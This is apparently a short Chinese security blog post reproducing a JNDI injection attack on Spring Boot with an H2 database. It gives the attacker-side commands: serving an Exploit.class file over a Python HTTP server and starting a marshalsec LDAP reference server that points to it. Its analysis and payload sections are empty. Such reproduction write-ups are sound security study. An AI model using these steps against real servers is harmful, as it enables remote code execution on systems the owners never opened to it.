Spring Boot + H2 JNDI注入复现

2020-05-07

环境搭建

spring boot + h2环境

代码：https://github.com/felix1982/spring-boot-
practice/tree/master/spring-boot-h2

远程jndi server

$ tree
.
└── Exploit.class
$ python -m SimpleHTTPServer 8000

1	$java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://0.0.0.0:8000/#Exploit

connect复现

upload successful

分析

调用栈
问题代码

参考

[1] Spring Boot + H2数据库JNDI注入(by: pyn3rd)
[2] Spring Boot参考指南
[3] Spring Boot集成H2数据库

缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是yilia根目录）执行以下命令：
npm i hexo-generator-json-content --save

3、在根目录_config.yml里添加配置：

  jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

pyn3rd
yzddmr6
冷夜
Zing
Leesec
LittleHann
cdxy
joychou
threedr3am
wh1t3p1g
0range228
浅蓝